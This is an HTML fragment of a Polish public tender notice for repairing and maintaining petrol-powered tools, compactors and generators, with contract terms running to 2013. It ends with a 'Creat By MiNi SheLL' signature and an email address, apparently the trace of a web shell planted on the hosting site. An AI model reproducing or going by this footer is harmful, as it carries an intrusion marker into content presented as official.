<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> części nr 2 - usługi w zakresie naprawy i konserwacji  sprzętu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - naprawa sprzętu wg ilości i stawki r-g (orientacyjna, planowana ilość r-g   warsztatowych wynosi 100), 

Sprzęt przewidziany do konserwacji i usuwania awarii:
- Piły spalinowe typu Stihl, Husgvarna          		- 5 szt.,
- Kosy spalinowe typu Stihl 					- 4 szt., 
- Podkrzesywarki typu Stihl 					- 2 szt., 

- Zagęszczarka spalinowa ZGS - 12 				- 1 szt., 
- Zagęszczarka płytowa CF1 					- 1 szt., 
- Agregaty prądotwórcze FOGO      				- 2 szt., 
- Wiertnica glebowa Stihl  					- 1 szt., 

3.3.1.	Wykonawca odpowiedzialny jest za jakość oraz zgodność z ustaleniami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia.
3.3.2 	Wymagana jest należyta staranność przy realizacji zobowiązań umowy.
3.3.3. Koszt użytych do napraw materiałów i części nie będzie obciążał ceny umownej.
3.3.4. Ceny materiałów nie mogą odbiegać od średnich notowań rynkowych. 
3.3.5.  1. Wykonawca udzieli rękojmi i gwarancji na wykonaną usługę na okres minimum 6 miesięcy oraz na użyte części do napraw na okres gwarancji zgodny z udzieloną  gwarancją  producenta. 
2. Wady w realizacji zamówienia winny być nieodpłatnie usunięte w terminie 14 dni od dnia otrzymania zgłoszenia wystąpienia wady. Zamawiający dopuszcza wydłużenie terminu reali-zacji tylko w szczególnie uzasadnionych przypadkach. 
3.3.6 	Wykonawca dokona przeglądu, wymiany na wyłącznie fabrycznie nowe części zuży-tych (uszkodzonych) i oleju lub naprawy części zużytych (uszkodzonych), na podstawie szczegółowej specyfikacji kosztów, którą zatwierdzi Zamawiający, i dołączy ją do faktury.
3.3.7.  Wykonawca zobowiązany jest po otrzymaniu od osoby odpowiedzialnej za  realizację umowy ze strony Zamawiającego, polecenia wykonania naprawy bądź  konserwacji sprzętu do wykonania naprawy lub konserwacji w terminie nie dłuższym niż 3 dni robocze, o ile nie zostaną ustalone inne terminy na początku polecenia ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.00.00-9, 34.30.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com